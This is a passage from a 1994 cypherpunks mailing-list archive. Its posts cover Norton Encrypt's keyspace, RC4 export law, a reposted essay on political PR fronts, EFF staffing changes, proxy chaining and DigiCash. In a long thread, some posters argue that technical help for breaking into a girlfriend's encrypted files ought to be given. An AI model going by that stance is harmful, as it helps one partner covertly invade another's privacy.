unless those responsible for posting the code are identified. Existing RC4-based systems weren't compromised and may have benefited, since we can now see that system backdoors don't exist. What we're left with are more questions, fewer answers, and the suspicion that one of these days a big shoe is going to fall on software and intellectual-property rights - one that won't make anyone completely happy. Johnathan Erickson editor-in-chief From pstemari at erinet.com Fri Dec 23 22:25:28 1994 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Fri, 23 Dec 94 22:25:28 PST Subject: Attacking Norton Encrypt Message-ID: <9412240617.AA02276@eri> At 09:52 PM 12/23/94 IST, rishab at dxm.ernet.in wrote: > >Regarding the simple question about Norton Encrypt's security (and ignoring >the alt.relationship-counsellor interlude), I believe Norton uses DES (for >'maximum security' or a 'fast proprietary' method for convenience. I don't >think it has the usual errors (password stored in ciphertext etc), but a >brute force attack on DES is beyond the means of most Norton users IAC. Perhaps, but if the earlier post is accurate about it mapping UC to lc and only accepting 8 characters of password, you've gone from a 56 bit keyspace to a ~38 bit keyspace. A dictionary attack is certainly feasible--I don't recall what speeds have been achieved for brute-forcing DES lately. --Paul J. Ste. Marie From jonathon.fletcher at psych.stir.ac.uk Fri Dec 23 22:42:55 1994 From: jonathon.fletcher at psych.stir.ac.uk (Jonathon Fletcher) Date: Fri, 23 Dec 94 22:42:55 PST Subject: Breaking into girlfriend's files Message-ID: <9412240641.AA23806@oss.stir.ac.uk> It seems a little strange that cypherpunks are arguing over whether or not to disclose information about a (supposedly) cryptographic product to a certain individual. Let's relate this this to other examples of restricting cryptographic information - can anyone think of any groups or organisations that do this ? Okay, now we've thought of a couple, lets compare reasons (left as exercise for the reader) for the restriction of this information and our opinions on those restrictions. Have I made my point ? Should we change the infamous slogan to: "Cyperpunks is watching you". Someone asked a techical question about cryptography, other list members answered it. Can we now get on with more relevant matter ? -Jon -- Jonathon Fletcher, j.fletcher at stirling.ac.uk From jamesd at netcom.com Sat Dec 24 00:01:46 1994 From: jamesd at netcom.com (James A. Donald) Date: Sat, 24 Dec 94 00:01:46 PST Subject: Breaking into girlfriend's files In-Reply-To: Message-ID: On Fri, 23 Dec 1994, Ian Farquhar wrote: > > What a load of amoral rubbish. > On Fri, 23 Dec 1994, Black Unicorn wrote: > By who's standard? Yours? Well I guess Black Unicorns standards are not such that one should entrust secrets to him. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From jamesd at netcom.com Sat Dec 24 00:12:25 1994 From: jamesd at netcom.com (James A. Donald) Date: Sat, 24 Dec 94 00:12:25 PST Subject: Breaking into girlfriend's files In-Reply-To: <9412240641.AA23806@oss.stir.ac.uk> Message-ID: On Sat, 24 Dec 1994, Jonathon Fletcher wrote: > > It seems a little strange that cypherpunks are arguing over whether or > not to disclose information about a (supposedly) cryptographic product > to a certain individual. The criticism was that the proposed use of the knowledge was wrong -- not that the knowledge was wrong. Then there was a larger debate -- is morality a threat to liberty, or is coercion the only serious threat to liberty. Now if you are eighteen or so, or if you have retarded emotional development, the fact that it is real hard to get laid may seem positive and powerful proof that morality is indeed a grave threat to liberty. But of course the fact that it is real hard to get laid is a result of sociobiology, not of cultural values and morality. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From jonathon.fletcher at psych.stir.ac.uk Sat Dec 24 01:19:28 1994 From: jonathon.fletcher at psych.stir.ac.uk (Jonathon Fletcher) Date: Sat, 24 Dec 94 01:19:28 PST Subject: Breaking into girlfriend's files In-Reply-To: Message-ID: <9412240917.AA23894@oss.stir.ac.uk> James A. Donald writes: > The criticism was that the proposed use of the knowledge was wrong > -- not that the knowledge was wrong. > Then there was a larger debate -- is morality a threat to liberty, > or is coercion the only serious threat to liberty. or that liberty is it's own enemy. One individual's concept of liberty may infringe on anothers to the point where one individual feels restricted by the other. The discussion could go on for hours. My point was not that breaking into your girlfriend's files because you haven't got the guts to ask her something directly is somehow acceptable, personally I think it isn't acceptable. My point was that the list adopted the position of censor in deciding whether or not to 'release' information to the enquirer. That is what I disagree with. The 'I should be able to read her files in case she's cheating on me' argument is only a matter of steps away from the 'I should be able to tap her phone in case she's cheating on me'. > Now if you are eighteen or so, or if you have retarded emotional > development, I can't remember the former, and I can't associate with the latter, so I won't comment ;-) This is terribly off-topic. Responses by email - no more waste of list bandwidth please. -Jon -- Jonathon Fletcher, j.fletcher at stirling.ac.uk From blancw at pylon.com Sat Dec 24 01:58:19 1994 From: blancw at pylon.com (blancw at pylon.com) Date: Sat, 24 Dec 94 01:58:19 PST Subject: Breaking into girlfriend's files Message-ID: <199412240959.BAA16608@deepthought.pylon.com> Responding to msg by Black Unicorn, who is having a bad hair day (and so close to Christmas!): "Had I encrypted with Norton encrypt? I would have been deserving of whatever attack ensued." Are the cypherpunks all of one mind regarding ideals and morality? Had I inquired of the list how I could break into my dearest one's privacy, I would have been deserving of whatever commentary ensued regarding the disgusting implications of that act. "Disgusting. Get off this list, you belong on alt.codependency.recovery, or alt.bleeding.liberal." (Say - isn't this why Tim left for a bit? Oh, well.) "I may disagree with you, but I will defend to the death your right to express your [sanctimonious] opinion." (or something like that). .. Blanc From karn at unix.ka9q.ampr.org Sat Dec 24 03:11:54 1994 From: karn at unix.ka9q.ampr.org (Phil Karn) Date: Sat, 24 Dec 94 03:11:54 PST Subject: Thoughts on 15 day CJ crypto Message-ID: <199412241111.DAA01099@unix.ka9q.ampr.org> In article <94Dec16.08.5320 at qualcomm.com>, you write: |> So it's possible the RSA requirement is in there to provide an |> assurance that the right key was selected. Isn't it common practice to pad out a plaintext block with random garbage to the size of the modulus before you RSA-encrypt it? E.g., if you have an 8-byte DES key and you want to encrypt it with an RSA public key having a 512-bit modulus, you'd stick 56 bytes of random stuff in front of the DES key before you do the exponentiation. When you decrypt with the secret key, you simply throw away the random padding. At least RSAREF does this. Wouldn't this thwart the kind of attack you describe? Phil From david.lloyd-jones at canrem.com Sat Dec 24 03:18:12 1994 From: david.lloyd-jones at canrem.com (David Lloyd-Jones) Date: Sat, 24 Dec 94 03:18:12 PST Subject: EXPORT CONTROLS ON RC4 In-Reply-To: <199412240621.AAA24808@jpunix.com> Message-ID: <60.17995.6525.0C1C5829@canrem.com> This DDJ reference to export control laws is pretty typical: AS+From: nobody at jpunix.com (Anonymous) AS+ENCRYPTION software. Is posting such software online worldwide the same as +exporting it? If so, the State Department might have a thing or two to say. The State Department may claim the right to have some say in things under the Commerce Clause, Article 1, Sec. 8 of the Constitution. Seems to me, however, that the Fifth, Ninth and Tenth Amendments pretty clearly slap this claim down: the right to trade freely predates the United States, and is hence "reserved... to the people", in the language of the Tenth. -dlj. david.lloyd-jones at canrem.com * 1st 1.11 #3818 * But I'm a vegetarian. OK, let's eat you first. From bart at netcom.com Sat Dec 24 04:36:32 1994 From: bart at netcom.com (Harry Bartholomew) Date: Sat, 24 Dec 94 04:36:32 PST Subject: DDJ editorial Message-ID: <199412241236.EAA13217@netcom14.netcom.com> I think this sentence was missing a NOT: If, as some claim and RSA disputes, the code was reverse-engineered from object files in off-the-shelf software, then the law was probably broken - unless RSA and other vendors decide to test the strength of highly questionable and likely unenforceable shrink-wrap licenses that try to prohibit disassembly/decompilation. (But I don't have the DDJ to verify this) From ddt at lsd.com Sat Dec 24 05:39:21 1994 From: ddt at lsd.com (Dave Del Torto) Date: Sat, 24 Dec 94 05:39:21 PST Subject: FRAUD: Progress & Freedom on the Web-Frontier? Message-ID: Apologies for this not-so-crypto posting, but this is highly interesting for those who might've missed it. Note the references to our new $4M Newtonian Speaker of the House... dave ________________________________________________________________________ Speaking of "term limits," hasn't Rush Limbaugh gotten enough attention? =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= cut here =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From: Phil Agre T H E N E T W O R K O B S E R V E R VOLUME 1, NUMBER 12 DECEMBER 1994 ... The future of network politics. In the December 1994 issue of Wired (page 121) there appears an ad for something called The Progress and Freedom Foundation. Under the headline "Cyberspace: It's Nobody's Highway", this advertisement announces the availability of a "Magna Carta for the Knowledge Age". Small type at the bottom informs us that this document ... ... emerged from an August 23-24 conference in Atlanta, Georgia. Participants included Jerry Berman, Esther Dyson, John Gage, George Gilder, Jay Keyworth, Lewis Perelman, Michael Rothschild and Alvin Toffler. Major support for the conference was provided by BELLSouth and the Competitive Long Distance Coalition. Additional support was provided by Agorics Enterprises, Inc., AT&T, Cox Enterprises, J.L. Dearlove and Affiliates, Forbes, Scientific Atlanta, Video Tape Associates and Wired. Creative Consulting and Ad Production by J.L. Dearlove & Affiliates, Chicago, IL. Regarding the Magna Carta itself, it provides the e-mail address PFF at aol.com and some phone numbers, or, if you must, cross your fingers and send POM to 1250 H St. NW, Suite 550 Washington, DC 20005. Listen to the language. If you must? It's as though they're trying to talk jive to ingratiate themselves with the kids on the street. They don't even have a home page. So who are these folks? The ad says that: The Progress & Freedom Foundation believes cyberspace is a frontier, not a government project. We can learn a little more by turning to journalistic accounts. For example, in the 12/12/94 Wall Street Journal's article on Republican plans for the Food and Drug Administration (page A16), we read the following: In September, Rep. [Newt] Gingrich [incoming Speaker of the House] told a biotechnology trade group that he was launching a project to design a replacement for the FDA. Leading the effort is the Progress and Freedom Foundation, whose head, Jeffrey Eisenach, formerly ran Gopac, Mr. Gingrich's political action committee. Without apology, Mr. Eisenach acknowledges that drug companies are financial contributors to the foundation, and notes that drug companies will be involved in the project. And he dismisses suggestions that drug-company involvement could taint the results. "So I should go to Ralph Nader and do it?" he says. "That's silly". So the Progress and Freedom Foundation is active on more than just telecommunications issues. But it is not just an industry lobbying organization. In particular, the connection to Gopac is not at all coincidental. The purpose of Gopac has been to train conservative Republican candidates in the particularly aggressive style of politicking that Mr. Gingrich pioneered during his early days in Congress, and the Progress and Freedom Foundation may contribute to a generalization of this model. [By 1994] "Newt World" was now far-flung, from GOPAC to the National Republican Congressional Campaign Committee; the Friends of Newt Gingrich campaign committee; a weekly TV show on the conservative cable TV network, National Empowerment Television, and a think tank called the Progress and Freedom Foundation. Its messages were coordinated with talk-show hosts such as Rush Limbaugh and with Christian Coalition groups. [...] "The goal of this project is simple", Jeffrey A. Eisenach, director of the Progress and Freedom Foundation, wrote in a fund-raising letter. "To train, by April, 1996, 200,000-plus citizens into a model for replacing the welfare state and reforming our government." (LA Times 12/19/94, page A31) What can we expect from this rising army? The Gopac's record provides some evidence. Much has been written about the tactics that Gopac suggested to its candidates. An article about Gopac leader Joe Gaylord (Wall Street Journal, 8 December 1994, page A18), for example, says: Mr. Gaylord is one of the brains behind Gopac ... . [He] wrote its how-to textbook, which urges challengers to "go negative" early and "never back off". They must sometimes ignore voters' main concerns because "important issues can be of limited value". The book suggests looking for a "minor detail" to use against opponents, pointing to Willie Horton as a good example. Though it says a positive proposal also can be helpful, it counsels candidates to consider the consequences: "Does it help, or at least not harm, efforts to raise money?" Mr. Gingrich has called the book "absolutely brilliant". Even more has been written about the most famous Gopac document, ... a memo by Gingrich called "Language, a Key Mechanism of Control", in which the then-House minority whip gave candidates a glossary of words, tested in focus groups, to sprinkle in their rhetoric and literature. For example, it advised characterizing Democrats with such words as "decay, sick, pathetic, stagnation, corrupt, waste, traitors". (LA Times, 12/19/94, pages A31) In my view, though, the most significant feature of Newt World is not its language, which is certainly fascinating, or its association with industry, which is hardly surprising or novel, but rather its use of technology. Mr. Gingrich is a pioneer in the use of new technologies to build a political movement. I do have to hand it to him -- he has worked hard and he has a genius for political organizing. Having observed in the early 1980's that candidates spend a lot of dead time on the road traveling around during campaigns, he hit upon the idea of sending them videos and other materials about campaigning. This is what Gopac did. As time went on, they generalized this model to include scheduled conference calls and video broadcasts in which Mr. Gingrich and others would provide campaigners with advice about messages and methods. How does this model scale to 200,000-plus people? Well, at that point it starts to sound a lot like the information superhighway -- a technology for centralized broadcast of programs to a group that isn't the "mass audience" of conventional TV broadcasting but is distributed across the country. More tailored programming could be distributed as well -- to particular geographical regions, to activists on particular issues, and so forth. It's not a decentralized model like the Internet, but then it's not the political vision that normally goes with the Internet either. It's closer to the asymmetrical distribution model found in the plans of many cable and regional phone companies -- some of whom, you might recall, sponsored the Progress and Freedom Foundation's conference. This is not to say that Newt Gingrich and company are engaged in a conspiracy against the Internet. After all, Mr. Gingrich has made some encouraging statements about making Congressional materials available to citizens on the Internet, and this is certainly a good and laudable thing. The situation and the participants' views are often complicated. The point is that technologies are not neutral. Technologies certainly do not determine how they will be used, but neither are they simply tools that can be used for any old purpose at all. Rather, technologies and social forms evolve together, according to the affordances of the machinery and the forces of the social system. None of this coevolution goes simply or smoothly in practice, of course, nor is any of it inevitable. As the Internet illustrates extremely well, machines frequently have uses that nobody ever thought of, and these can often be resources for people wishing to engage in genuine, bottom-up democracy. The machines can't restore the health of our democracy, though -- we have to do that ourselves. And in doing so, we need to be aware of the complex and ambiguous interactions between the workings of our machinery and the forms of our political life. In particular, we should not assume that the Internet's open and decentralized architecture necessarily makes it a force for democracy, or that it necessarily levels the field for all players. The practice of politics on the Internet is increasingly complicated, with new kinds of players and new variations on the existing games. As a case study in these issues, let's consider an organization called the Wireless Opportunities Coalition. The WOC has circulated an alert on the net seeking support for a certain position in a fairly arcane regulatory fight within the FCC over the rules in certain frequency bands for digital wireless communications. The WOC's materials are also available on WWW: http://wireless.policy.net/wireless/wireless.html The basic idea of the WOC's arguments is that companies with very sensitive communications devices shouldn't be able to displace other users of certain frequencies, including low-power digital wireless communications used for educational purposes, for example in local community networking in areas that do not have high rates of telephone service. This certainly sounds like a good cause, and it probably even *is* a good cause. But note that the Wireless Opportunities Coalition, is a creation of a public relations firm called Issue Dynamics Inc, whose largest clients include Bell Atlantic and a lobbying alliance of the US regional phone companies. (To be fair, they also include the Democratic Senatorial Campaign Committee.) I couldn't find this information by searching through the WOC web pages, but you can verify it easily enough by aiming your web client at the underlying index: http://wireless.policy.net/ As recently as December 9th this page was entitled "IDI Index"; it is now, as of December 20th, called "Policy.Net". Click on "Issue Dynamics", read down to the bottom, and click on the IDI logo, which will take you to: http://idi.net/clients.html Why is it "idi.net" and not "idi.com"? Never mind. My point is not that these folks are evil or that they have no right to speak. My point is that they are a public relations firm practicing their craft on the Internet. In the future, I expect that ordinary citizens using the Internet will want to inform themselves about who's behind all of those slick web pages. Public relations and its place in society is a fascinating and important topic, and I encourage everyone to learn more about it. If you're interested, here is a brief reading list: Edward L. Bernays, The Engineering of Consent, Norman: University of Oklahoma Press, 1955. Bill Cantor, ed, Experts in Action: Inside Public Relations, New York: Longman, 1984. Oscar H. Gandy, Jr., Beyond Agenda Setting: Information Subsidies and Public Policy, Norwood, NJ: Ablex, 1982. Jack A. Gottschalk, Crisis Response: Inside Stories on Managing Image Under Siege, Detroit: Visible Ink, 1993. James E. Grunig and Todd Hunt, Managing Public Relations, New York: Holt, Rinehart and Winston, 1984. Elizabeth L. Toth and Robert L. Heath, eds, Rhetorical and Critical Approaches to Public Relations, Hillsdale, NJ: Erlbaum, 1992. Finally, let me close with a pertinent quote: "One practice which I believe should be eliminated is that of the so-called "paper front". A client is advised to finance an "organization" to promote or fight for its cause under the guise of an independent and spontaneous movement. This is a plain public deceit and fraud and of course is a technique developed with consummate skill and in great profusion by the Communists. In a free country any interest with a cause has a right to present its case to the public, to inform and, if possible, to persuade to its heart's content. But that right of free speech also carries the obligation that the source of it will be in the open for all to see. Attempts to fool the public by making it believe an "organization" existing only on paper is really a vociferous group favoring this or that cause have helped to cast a shadow upon the business of public relations counseling. No counsel who wants to preserve his own reputation will ever be a party to the issuance of any public statement by a client unless the source is clearly set forth. Obviously, when a client is involved in a public relations controversy, supporting statements are welcomed from every responsible source. But such statements should be issued by real-live people or organizations and not phoneys." This quote is from the autobiography of John W. Hill ("The Making of a Public Relations Man", recently republished by NTC Business Books, pages 139-140), who founded one of the largest public relations firms, Hill and Knowlton. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= end here =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From ddt at lsd.com Sat Dec 24 05:39:33 1994 From: ddt at lsd.com (Dave Del Torto) Date: Sat, 24 Dec 94 05:39:33 PST Subject: FYI: (Meeks) Berman leaves EFF Message-ID: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= cut here =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Date: Tue, 20 Dec 1994 17:04:23 -0800 From: "Brock N. Meeks" Subject: CWD Changes in the Wind At EFF CyberWire Dispatch // Copyright (c) 1994 // Jacking in from the "Back to the Future" Port: Washington, DC -- The Electronic Frontier Foundation has fired its Policy Director Jerry Berman and will soon release a sweeping new agenda for 1995 that promises to return the organization to its original grassroots beginning. Asked to comment on his firing, Berman bristles and says: "I think that's baloney." Then he quickly adds: "Did you ever think I might have wanted to leave?" Berman has, in fact, left EFF, to head a new, as yet unannounced, policy group called the Center for Democracy and Technology. His departure from EFF and the creation of CDT will be made public this week in a joint announcement with EFF, sources said. The official line that will be spun to the public is that the two came to a "mutual parting of the ways." That benign statement, however, doesn't reflect the long hours of the behind the scenes deliberations, in which the language of the press releases will be a cautiously worded as an official State Department briefing. Heroes and pioneers always take the arrows; EFF lately has looked more like a pin-cushion than its self-appointed role as protector of all things Cyberspace. The beleaguered organization has over the course of the past two years endured often withering criticism from the very frontier citizens it was sworn to uphold and protect. The reason: A perceived move away from its grassroots activism to the role of a consummate Washington Insider deal maker. Berman is the man largely responsible for cutting EFF's policy cloth. He wears the suit well. Maybe too well. Although he has the political acumen to arm-wrestle inside-the-beltway, it comes at the expense of his management style, EFF insiders said. Those shortcomings came at the expense of EFF's day-to-day operations and didn't go unnoticed by its board of directors. The EFF board in October fired Berman for mismanaging the group's organizational and fiscal responsibilities. No impropriety or malfeasance was alleged, the board was simply dissatisfied with Berman's day-to-day managing of the shop. In a precursor to the board's October decision, it split Berman's job, giving him charge of just the policy arm, which board members said played to his strength. They then hired Andrew Taubman as executive director to oversee the day to day tasks. Separate from the organizational and fiscal misgivings, the board also couldn't brook with priority on policy affairs that Berman had engineered. Although Berman expertly navigated EFF through the choppy political waters of Washington, that course increasingly steered the organization away from its original vision as a populist group. Never was the hardcore policy-driven slant of EFF more apparent than during the two-plus year political firestorm that surrounded the FBI's infamous Digital Wiretap. The political wrangling during that time, in which Berman brokered the influence of EFF with the backing of the telephone, computer and software industries, to reach a compromise with legislators and the FBI on the bill's language, increasingly drove a wedge between the organization and its grassroots membership. Nobody within EFF interviewed for this article disagreed with how Berman ran his policy tour de force. In fact, the board was generally in agreement that Berman did an excellent job in helping to broker a less nefarious version of the FBI's wiretap bill than would have otherwise passed without his involvement on EFF's behalf. As effective as Berman was in shuffling between the political and ideological interests of EFF and its members, the "inside baseball" political bullshit was largely lost on the community of the Net, who viewed it as a kind of betrayal. The fact that there would be a backlash from the Net came as no surprise to Berman and EFF, who recognized the fine line they had to walk in dealing with a politically charged issue rivaled only by the Administration's insipid Clipper Chip encryption policy. You see, the Net community is a binary braintrust, a world of ones and zeros -- either on or off -- in which shades of grey are rarely an option. Yet it is exactly these shades of grey in which Berman excels and thrives. It is a skill -- and damn near an art form -- to be able to move among the shadows and Washington's land of a thousand different agendas. And that's right where Berman had steered EFF. However, it's not where the EFF board thought the organization belonged. And so, in a few days the Net community will read a grand announcement in which EFF and Jerry Berman state they've had a "mutual parting of the ways." The announcement will be several fold, including: -- The formation of Berman's new Center for Democracy and Technology. -- That EFF has hired current board member David Johnson, currently a computer law attorney with the Washington law firm of Wilmer, Cutler and Pickering, to be its new policy director, although that exact title has yet to be finalized. -- A new policy agenda for EFF that includes creation of an annual "State of the Net" report. EFF Executive Director Taubman declined to comment on Berman's firing, saying only that the organization and its former director had, indeed, agreed to a "mutual parting of the ways." He said EFF and Berman's new group would continue to work closely with each other and that the efforts of each would be mutually beneficial. Johnson said he was excited about the new policy efforts he would be heading up for EFF, which, in addition to the "State of the Net" report, includes commissioning papers and studies to help build a more solid idea of what exactly constitutes the Net "community" on a global basis and helping to define the Net's community as recognizable legal entity. In addition to the new policy efforts, Johnson will have to restock EFF's policy department: All the EFF policy wonks have jumped ship, resigning their positions and joining with Berman's new venture. The upheaval at EFF -- which included moving the entire operation here to new digs in Washington -- apparently hasn't hurt moral which has "never been higher," Taubman said. Underscoring Taubman's remarks is EFF's on-line legal council Mike Godwin, who said the changes "create an opportunity for us to return to our more populist mission and vision that we started with." All Things Being Equal ================= Adversity for a political junkie is the warp and woof of Washington culture. Berman is no worse for the wear, having parachuted out of EFF and into his new organization. He said CDT will be differ from EFF "on what to emphasize." That emphasis will be to focus on "on the ground public policy," he said. And it won't only be Berman's staff that sets the scene for familiarity as he jump starts CDT. The former EFF policy staffers will supply him with horsepower and his political currency will open doors. But he needs cold hard cash to feed the troops and pay the rent. That means his new organization must have financial backing and here, too, there are no strangers. Berman's bringing along a fair chunk of EFF's corporate sponsors to his new home. Companies providing seed money to Berman's CDT include AT&T, Bell Atlantic, Nynex, Apple Computer and Microsoft. These same companies provided a combined $235,000 in donations to EFF in 1993, minus Nynex, which wasn't listed as a major donor (over $5,000) on EFF's tax returns. It's not known if these companies will continue to fund EFF in full or in part or what amount they have pledged to Berman's group. Just how well-heeled CDT is and exactly who makes up the full roster of its sponsorship remains to be seen. We'll know that after the organization files its first tax returns, which will be a matter of public record. Meeks out... From unicorn at access.digex.net Sat Dec 24 06:22:53 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Sat, 24 Dec 94 06:22:53 PST Subject: Breaking into girlfriend's files In-Reply-To: Message-ID: On Sat, 24 Dec 1994, James A. Donald wrote: > Date: Sat, 24 Dec 1994 00:11:50 -0800 (PST) > From: James A. Donald > To: Jonathon Fletcher > Cc: cypherpunks at toad.com > Subject: Re: Breaking into girlfriend's files > > On Sat, 24 Dec 1994, Jonathon Fletcher wrote: > > > > It seems a little strange that cypherpunks are arguing over whether or > > not to disclose information about a (supposedly) cryptographic product > > to a certain individual. > > The criticism was that the proposed use of the knowledge was wrong > -- not that the knowledge was wrong. You can only go two ways with this, either of which is self defeating. 1> All potentially damaging information, by virtue of it's potential "wrongful use" shall be banned. 2> All information clearly going to be used for the "wrong purposes" shall be restricted. There is simply no other way to restrict information as you propose. The result in 1>, I think is quite clear. The result in 2>, requires some ONE, some GROUP to decide what is and is not A> "clearly going to be used for," B> "the wrong purposes." Of course, now I want to know, what "objective" (read subjective to conventional wisdom) tests are going to be made to determine these criteria, who is going to make them, and who will enforce them? You end up with either a cut throat thought police regime, or slightly less offensive paternalistic censorship. You choose, what is it you want to have? A> complete amorality in that everything is restricted, (which is what restricting anything with potential harm essentially means), B> select morality, imposed by criteria lacking any objective element, as such criteria must always be subjective, or C> complete amorality in that everything is allowed. > > Then there was a larger debate -- is morality a threat to liberty, > or is coercion the only serious threat to liberty. > This completely evades the point. Your question refuses to acknowledge potential differences in the application and structure of morality. > Now if you are eighteen or so, or if you have retarded emotional > development, the fact that it is real hard to get laid may seem > positive and powerful proof that morality is indeed a grave threat > to liberty. > Evades the point, applies a silly analogy to Mr. Norton cracker, and then couples it with a crack about his potential age and mental facilities, a crack hardly as inappropiate as mine last night. > But of course the fact that it is real hard to get laid is a result > of sociobiology, not of cultural values and morality. Unless your Christian and unmarried. > --------------------------------------------------------------------- > We have the right to defend ourselves and our > property, because of the kind of animals that we James A. Donald > are. True law derives from this right, not from > the arbitrary power of the omnipotent state. jamesd at netcom.com > -uni- (Dark) 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From unicorn at access.digex.net Sat Dec 24 06:30:08 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Sat, 24 Dec 94 06:30:08 PST Subject: Breaking into girlfriend's files In-Reply-To: <199412240959.BAA16608@deepthought.pylon.com> Message-ID: On Sat, 24 Dec 1994 blancw at pylon.com wrote: > Date: Sat, 24 Dec 1994 01:59:07 -0800 > From: blancw at pylon.com > To: cypherpunks at toad.com > Subject: Re: Breaking into girlfriend's files > > Responding to msg by Black Unicorn, who is having a bad hair > day (and so close to Christmas!): I nominate this for understatement of the season. > "Had I encrypted with Norton encrypt? I would have been > deserving of whatever attack ensued." > > Are the cypherpunks all of one mind regarding ideals and > morality? Had I inquired of the list how I could break into > my dearest one's privacy, I would have been deserving of > whatever commentary ensued regarding the disgusting > implications of that act. In my view, this is absolutely so unless it is attached to censorship guised as moral correction. As I said, a proper response should have been the technical answer, followed by sage advice about the legality, and potential moral implications of use of the information as was proposed. > > "Disgusting. Get off this list, you belong on > alt.codependency.recovery, or alt.bleeding.liberal." > > (Say - isn't this why Tim left for a bit? Oh, well.) It is, and for this I owe the individual and the entire list an apology. Coupling an argument for censorship with some kind of moral judgement reacted so fouly with my concept of information freedom that I became rather enraged. Not that this excuses my behavior of course. Lesson learned, wait 20 minutes after composing a message before sending the final draft. > "I may disagree with you, but I will defend to the death your > right to express your [sanctimonious] opinion." (or something > like that). > How does censorship align with this historic phrase? Censorship based on opinion of what is and is not appropiate use? > .. > Blanc > -uni- (Dark) 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From unicorn at access.digex.net Sat Dec 24 06:34:34 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Sat, 24 Dec 94 06:34:34 PST Subject: Breaking into girlfriend's files In-Reply-To: Message-ID: On Sat, 24 Dec 1994, James A. Donald wrote: > Date: Sat, 24 Dec 1994 00:01:19 -0800 (PST) > From: James A. Donald > To: cypherpunks at toad.com > Cc: Ian Farquhar > Subject: Re: Breaking into girlfriend's files > > On Fri, 23 Dec 1994, Ian Farquhar wrote: > > > > What a load of amoral rubbish. > > > On Fri, 23 Dec 1994, Black Unicorn wrote: > > By who's standard? Yours? > > Well I guess Black Unicorns standards are not such that > one should entrust secrets to him. Absolutely not unless: 1> I am paid to keep them. 2> I am bound by an attorney-client relationship. 3> Ignore the above two in any absolute forms. But not for the reasons you suspect, in fact I submit the reverse is true. Clearly the distinction between the likelyhood of someone keeping a secret and the advisibility of disclosing damaging information to anyone, trustworthy or not (or protecting it insufficently, or failing to research the methods use you to protect it), evades you. If you cannot see that my trustworthiness, when a significantly positive variable, is not the sole consideration in deciding if you should tell me something, you're in the wrong area of speculation. Further, if you cannot see that my hands off and nose out of where it doesn't belong position, makes me a MORE attractive individual to confide in, one less likely to turn your secrets over to the thought police, or to pass judgement based on some personal and artificial moral construct bearing only limited resemblence to any other, and being utterly unpredictable, then you're in the wrong area of speculation. Query: Who is likely to turn more evidence over to police in criminal matters? 1> "Trusted" family members. 2> "Amoral" attornies who refuse to be blinded by conventional (read reactionary) morality? Who do you want knowing your secrets? (When anyone should know them at all) -uni- (Dark) > --------------------------------------------------------------------- > We have the right to defend ourselves and our > property, because of the kind of animals that we James A. Donald > are. True law derives from this right, not from > the arbitrary power of the omnipotent state. jamesd at netcom.com And I would submit, you, and you alone, the individual you, have the OBLIGATION to defend yourself and your property, and the RESPONSIBILITY to defend it less the arbitrary power of the omnipotent state come in and do it for you. -uni- (Dark) 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From entropy at IntNet.net Sat Dec 24 06:39:14 1994 From: entropy at IntNet.net (Jonathan Cooper) Date: Sat, 24 Dec 94 06:39:14 PST Subject: HTTP redirectors In-Reply-To: <199412202135.NAA21822@jobe.shell.portal.com> Message-ID: > One idea that was suggested here would be to have a local proxy process, > a very simple one which your fancy client connected to for all your net > accesses. This would be where you would implement encryption, or new > protocols for chaining, etc. This way we don't have to try to persuade > client writers to incorporate our improvements; the existing proxy > support provides the loophole we need. One nice feature, for example, > would be a full 128 bit IDEA or RC4 encryption engine so that overseas > Netscape users (or domestic ones who are stuck with crippled versions) > can get good security. Indeed. Then you could set your proxyserver to: http://localhost:4242/CHAIN:3/ ... which would connect to the local wedge on 4242, tell it to chain, and pass the URL to go to. Hopefully then the wedge could pick another one out of a local list and connect to it, passing: CHAIN:2, ad infinitum. It really does not seem to be very technically difficult. Once again, it comes down to "who's willing to run these beasts?" -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://hyperreal.com/~entropy/ ]-------[ Key-ID: 4082CCB5 ) From nesta at nesta.pr.mcs.net Sat Dec 24 06:46:37 1994 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Sat, 24 Dec 94 06:46:37 PST Subject: Breaking into girlfriend's files In-Reply-To: Message-ID: On Sat, 24 Dec 1994, Black Unicorn wrote: > You can only go two ways with this, either of which is self defeating. > > 1> All potentially damaging information, by virtue of it's potential > "wrongful use" shall be banned. > > 2> All information clearly going to be used for the "wrong purposes" > shall be restricted. > > > There is simply no other way to restrict information as you propose. > How about simply giving the information if you feel like it, and witholding it if you don't. And don't bother wether other people give it to him. A simple individual choice wthout attempting to set guidelines for morality or any of that worthless shit. i want to know everything http://www.mcs.com/~nesta/home.html i want to be everywhere Nesta's Home Page i want to fuck everyone in the world & i want to do something that matters /-/ a s t e zine From entropy at IntNet.net Sat Dec 24 06:49:15 1994 From: entropy at IntNet.net (Jonathan Cooper) Date: Sat, 24 Dec 94 06:49:15 PST Subject: No privacy with DigiCash In-Reply-To: <199412210221.SAA18077@jobe.shell.portal.com> Message-ID: > This is a really bad way of doing it IMO because it seems to defeat > one of the big selling points of DigiCash. Is there something I am > overlooking, some way to buy things privately with DigiCash? I don't think so. It appears that the initial implementation of DigiCash works exactly that way [based on what 